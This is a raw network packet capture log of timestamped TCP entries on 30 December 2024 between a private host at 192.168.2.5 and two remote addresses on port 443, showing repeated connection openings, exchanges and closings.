                                                                                                                                        Dec 30, 2024 11:46:35.959393978 CET49815443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:35.959489107 CET49815443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:35.959511995 CET44349815142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:35.959640026 CET44349815142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:35.959685087 CET49815443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:35.959701061 CET49815443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:35.960325003 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:35.960350990 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:35.960392952 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:35.960830927 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:35.960843086 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.007463932 CET44349814142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.007507086 CET44349814142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.007553101 CET49814443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.007553101 CET49814443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.007576942 CET44349814142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.007630110 CET44349814142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.007690907 CET49814443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.007690907 CET49814443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.009094000 CET49814443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.009109020 CET44349814142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.009114027 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.009140968 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.009212971 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.009856939 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.009864092 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.172013044 CET44349816142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.172061920 CET44349816142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.172076941 CET49816443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.172103882 CET44349816142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.172111988 CET49816443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.172137976 CET49816443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.172141075 CET44349816142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.172163010 CET44349816142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.172177076 CET49816443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.172204018 CET49816443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.173125982 CET49816443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.173136950 CET44349816142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.173759937 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.173799038 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.173894882 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.174293995 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.174299955 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.547137976 CET44349827142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.547215939 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.547941923 CET44349827142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.547992945 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.549825907 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.549830914 CET44349827142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.550133944 CET44349827142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.550180912 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.550630093 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.560022116 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.560081959 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.560753107 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.560797930 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.562318087 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.562326908 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.562915087 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.563061953 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.563293934 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.595320940 CET44349827142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.603327036 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.608432055 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.608485937 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.609092951 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.609097004 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.609343052 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.609347105 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.801527977 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.801615000 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.802134991 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.802140951 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.802335978 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:36.802341938 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.921899080 CET44349827142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.921957970 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.921989918 CET44349827142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.922034979 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.922117949 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.922161102 CET44349827142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.922224998 CET49827443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.923039913 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.923083067 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.923181057 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.923813105 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.923825026 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.930267096 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.930326939 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.930340052 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.930386066 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.930536985 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.930619001 CET44349828142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.930674076 CET49828443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.931165934 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.931206942 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:36.931353092 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.932090998 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:36.932101965 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.022278070 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.022355080 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.022372961 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.022382975 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.022427082 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.022444010 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.022494078 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.022497892 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.022530079 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.022547007 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.022581100 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.023693085 CET49829443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.023709059 CET44349829142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.024430990 CET49840443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.024475098 CET44349840142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.024539948 CET49840443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.024851084 CET49840443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.024861097 CET44349840142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.210802078 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.210855007 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.210864067 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.210885048 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.210918903 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.210947990 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.210952997 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.210978031 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.211107016 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.211818933 CET49830443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.211833954 CET44349830142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.212476015 CET49841443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.212519884 CET44349841142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.212599993 CET49841443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.212877035 CET49841443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.212888002 CET44349841142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.525832891 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.525954008 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.526613951 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.526702881 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.530249119 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.530265093 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.530556917 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.530633926 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.531060934 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.532156944 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.532226086 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.532912970 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.532968998 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.534392118 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.534401894 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.534641027 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.534686089 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.534992933 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.571325064 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.575323105 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.623881102 CET44349840142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.623940945 CET49840443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.624458075 CET49840443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.624469995 CET44349840142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.626458883 CET49840443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.626466036 CET44349840142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.812037945 CET44349841142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.812103033 CET49841443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.812694073 CET49841443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.812707901 CET44349841142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.812879086 CET49841443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.812886000 CET44349841142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.902117968 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.902177095 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.902185917 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.902229071 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.902286053 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.902303934 CET44349839142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.902316093 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.902355909 CET49839443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.902990103 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.903012991 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.903073072 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.903305054 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.903323889 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.905783892 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.905837059 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.905858994 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.905910969 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.905950069 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.905991077 CET44349838142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.906037092 CET49838443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.906425953 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.906455040 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.906512976 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.906858921 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:37.906873941 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.978431940 CET49840443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.978564978 CET49841443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.979186058 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.979223967 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.979298115 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.980443954 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.980463028 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.981683016 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.981720924 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:37.981834888 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.983721972 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:37.983736992 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.526176929 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.526274920 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.526995897 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.527100086 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.529304981 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.529324055 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.529668093 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.529757023 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.530121088 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.533849001 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.533929110 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.534626961 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.534692049 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.536525011 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.536550045 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.536887884 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.536947012 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.537345886 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.571342945 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.579339027 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.582374096 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.582429886 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.582962990 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.582973957 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.583157063 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.583163023 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.584290028 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.584460974 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.584758997 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.584767103 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.584914923 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.584918976 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.895195007 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.895287991 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.895333052 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.895435095 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.895500898 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.895548105 CET44349847142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.895606995 CET49847443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.896509886 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.896616936 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.896698952 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.897001028 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.897028923 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.911794901 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.911874056 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.912015915 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.912059069 CET44349846142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.912116051 CET49846443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.912797928 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.912822962 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.912951946 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.913173914 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:38.913182974 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.982970953 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.983026028 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.983120918 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.983119965 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.983215094 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.986768007 CET49850443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.986790895 CET44349850142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.988023043 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.988054037 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:38.988157034 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.988392115 CET49864443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:38.988399982 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.139352083 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.139480114 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.139481068 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.139509916 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.139529943 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.139578104 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.139657974 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.139816046 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.139873028 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.140424013 CET49849443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.140441895 CET44349849142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.141089916 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.141133070 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.141205072 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.141447067 CET49865443192.168.2.5142.250.186.129
                                                                                                                                        Dec 30, 2024 11:46:39.141460896 CET44349865142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.497555017 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.497656107 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.498312950 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.498374939 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.501921892 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.501929045 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.502167940 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.502219915 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.502641916 CET49861443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.543040991 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.543226004 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.543351889 CET44349861142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.544228077 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.544306993 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.546143055 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.546178102 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.546533108 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.546674967 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.547101974 CET49863443192.168.2.5142.250.186.174
                                                                                                                                        Dec 30, 2024 11:46:39.587362051 CET44349863142.250.186.174192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.602658987 CET44349864142.250.186.129192.168.2.5
                                                                                                                                        Dec 30, 2024 11:46:39.602797031 CET49864443192.168.2.5142.250.186.129
